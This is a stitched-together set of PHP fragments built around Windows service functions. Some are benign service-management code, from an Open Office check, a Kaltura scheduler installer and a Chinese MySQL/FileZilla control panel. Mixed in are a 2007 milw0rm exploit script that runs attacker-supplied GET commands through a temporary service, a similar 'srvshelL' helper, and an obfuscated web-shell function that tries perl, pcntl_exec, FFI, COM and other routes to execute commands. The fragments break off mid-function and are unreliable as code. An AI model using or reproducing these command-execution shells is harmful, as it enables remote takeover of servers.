public function start()
{
if (win32_start_service($this->serviceName)) {
error_log($this->serviceDisplayName . " Status: Started");
return true;
}
throw new \Exception("Error Stopping Service: " . $this->serviceDisplayName);
}
function srvshelL($command)
{
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while (!file_exists($name)) {
sleep(1);
}
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
$result = win32_query_service_status($OOService);
if (is_array($result)) {
$iProcessId = $result['ProcessId'];
if (!empty($iProcessId) && $iProcessId != 0) {
// If there is a process id (PID) then open office is running so we exit
if ($sGiveOutput) {
echo 1;
}
exit;
}
}
}
// Service is not running - log it and attempt to start
$default->log->error('Check Open Office Task: Open office service is not running... trying to start it.');
// Use the win32 service start
$result2 = win32_start_service($OOService);
if ($result2 == 0) {
// Service started successfully
$default->log->debug('Check Open Office Task: Open office service started.');
if ($sGiveOutput) {
echo 1;
}
exit;
}
$default->log->error('Check Open Office Task: Open office service could not be started. Error code ' . $result2);
// Attempt using the dmsctl batch script
$sPath = realpath('../../bin/dmsctl.bat');
if (file_exists($sPath)) {
$sCmd = "\"{$sPath}\" start";
$default->log->debug('Check Open Office Task: ' . get_current_user());
$default->log->debug('Check Open Office Task: ' . $sCmd);
function start()
{
$this->last_error = win32_start_service($this->name, $this->machine);
return $this->last_error === WIN32_NO_ERROR or $this->last_error === WIN32_ERROR_SERVICE_ALREADY_RUNNING;
}
}
}
}
}
}
exit(0);
case 'install':
win32_create_service(array('service' => $serviceName, 'display' => 'Kaltura asynchronous batch jobs scheduler', 'description' => 'Kaltura asynchronous batch jobs scheduler', 'params' => __FILE__ . " run {$phpPath} {$iniDir}", 'path' => $phpPath, 'start_type' => WIN32_SERVICE_AUTO_START, 'error_control' => WIN32_SERVER_ERROR_NORMAL));
KalturaLog::info('Service Installed');
exit(0);
case 'uninstall':
win32_delete_service($serviceName);
KalturaLog::info('Service Removed');
exit(0);
case 'start':
win32_start_service($serviceName);
KalturaLog::info('Service Started');
exit(0);
case 'stop':
win32_stop_service($serviceName);
KalturaLog::info('Service Stopped');
exit(0);
case 'run':
win32_start_service_ctrl_dispatcher($serviceName);
win32_set_service_status(WIN32_SERVICE_RUNNING);
break;
case 'debug':
set_time_limit(10);
break;
default:
KalturaLog::info('Unkown action');
### ###
### Note: Tested on 5.2.1 ###
### ###
### Author: NetJackal ###
### Email: nima_501[at]yahoo[dot]com ###
### Website: http://netjackal.by.ru ###
### ###
### ###
### Usage: http://victim.net/nj.php?CMD=[command] ###
#####################################################
$command = isset($_GET['CMD']) ? $_GET['CMD'] : 'dir';
#cammand
$dir = ini_get('upload_tmp_dir');
#Directory to store command's output
if (!extension_loaded('win32service')) {
die('win32service extension not found!');
}
$name = $dir . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = empty($_SERVER['ComSpec']) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array('service' => $n, 'display' => $n, 'path' => $cmd, 'params' => "/c {$command} >\"{$name}\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec = file_get_contents($name);
unlink($name);
echo "<pre>" . htmlspecialchars($exec) . "</pre>";
?>
# milw0rm.com [2007-07-27]
case '重启':
win32_restart_service($service->item(0)->getElementsByTagName("mysql")->item(0)->nodeValue);
echo '<SCRIPT>alert("MySQL重启命令执行完成")</SCRIPT>';
break;
default:
break;
}
switch ($_POST['filezilla']) {
case '启动':
win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
echo '<SCRIPT>alert("FileZilla启动命令执行完成")</SCRIPT>';
break;
case '停止':
win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
echo '<SCRIPT>alert("FileZilla停止命令执行完成")</SCRIPT>';
break;
case '重启':
win32_stop_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
sleep(5);
win32_start_service($service->item(0)->getElementsByTagName("filezilla")->item(0)->nodeValue);
echo '<SCRIPT>alert("FileZilla重启命令执行完成")</SCRIPT>';
break;
default:
break;
}
} else {
echo '<hr/>您的服务器没有为PHP安装<b>win32service</b>扩展库,请前往PHP官方站点<a href="http://pecl.php.net/package/win32service">下载安装</a>至php的ext目录当中,并注意要在php.ini中添加<b>extension=php_win32service.dll;</b>语句,最后重新启动nginx生效!<u>注意:请核对好PHP版本</u>';
}
?>
</center></body>
</html>
function z6v($c)
{
global $win, $tempdir;
$r = '';
if (!empty($c)) {
if (!$win) {
if (extension_loaded('perl')) {
@ob_start();
$p = new perl();
$p->eval("system('{$c}')");
$r = @ob_get_contents();
@ob_end_clean();
} elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
$r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
$o = $tempdir . uniqid('pcntl');
$pid = @pcntl_fork();
if ($pid == -1) {
$r .= '[-] Could not fork. Exit';
} elseif ($pid) {
$r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
} else {
$c = array(" -e 'system(\"{$c} > {$o}\")'");
if (@pcntl_exec('/usr/bin/perl', $c)) {
exit(0);
}
if (@pcntl_exec('/usr/local/bin/perl', $c)) {
exit(0);
}
die;
}
$r = z9p($o);
@unlink($o);
}
} else {
$o = $tempdir . uniqid('NJ');
if (extension_loaded('ffi')) {
$a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded('win32service')) {
$s = uniqid('NJ');
@win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
@win32_start_service($s);
@win32_stop_service($s);
@win32_delete_service($s);
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} elseif (extension_loaded("win32std")) {
@win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
while (!@file_exists($o)) {
sleep(1);
}
$r = z9p($o);
} else {
$a = new COM("WScript.Shell");
$a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
$r = z9p($o);
}
@unlink($o);
}
}
return $r;
}